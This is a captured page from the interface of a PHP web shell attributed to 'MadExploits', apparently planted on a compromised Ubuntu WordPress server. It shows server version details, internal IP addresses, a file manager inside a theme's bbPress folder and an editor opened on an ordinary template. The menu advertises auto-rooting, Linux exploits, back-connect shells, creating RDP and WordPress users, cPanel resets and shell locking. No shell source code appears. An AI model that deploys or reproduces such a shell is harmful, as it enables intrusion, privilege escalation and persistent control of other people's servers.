Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
owc /
wp-content /
themes /
eduma /
bbpress /
[ HOME SHELL ]
Name
Size
Permission
Action
content-archive-forum.php
642
B
-rwxr-x--x
content-archive-topic.php
798
B
-rwxr-x--x
content-search.php
733
B
-rwxr-x--x
content-single-forum.php
1.08
KB
-rwxr-x--x
content-single-reply.php
446
B
-rwxr-x--x
content-single-topic-lead.php
2.36
KB
-rwxr-x--x
content-single-topic.php
979
B
-rwxr-x--x
content-single-user.php
939
B
-rwxr-x--x
content-single-view.php
550
B
-rwxr-x--x
content-statistics.php
1.8
KB
-rwxr-x--x
content-topic-tag-edit.php
349
B
-rwxr-x--x
form-reply.php
6.2
KB
-rwxr-x--x
form-search.php
721
B
-rwxr-x--x
form-topic.php
7.76
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : content-search.php
<?php /** * Search Content Part * * @package bbPress * @subpackage Theme */ ?> <div id="bbpress-forums"> <?php bbp_set_query_name( bbp_get_search_rewrite_id() ); ?> <?php do_action( 'bbp_template_before_search' ); ?> <?php if ( bbp_has_search_results() ) : ?> <?php bbp_get_template_part( 'pagination', 'search' ); ?> <?php bbp_get_template_part( 'loop', 'search' ); ?> <?php bbp_get_template_part( 'pagination', 'search' ); ?> <?php elseif ( bbp_get_search_terms() ) : ?> <?php bbp_get_template_part( 'feedback', 'no-search' ); ?> <?php else : ?> <?php bbp_get_template_part( 'form', 'search' ); ?> <?php endif; ?> <?php do_action( 'bbp_template_after_search_results' ); ?> </div>
Close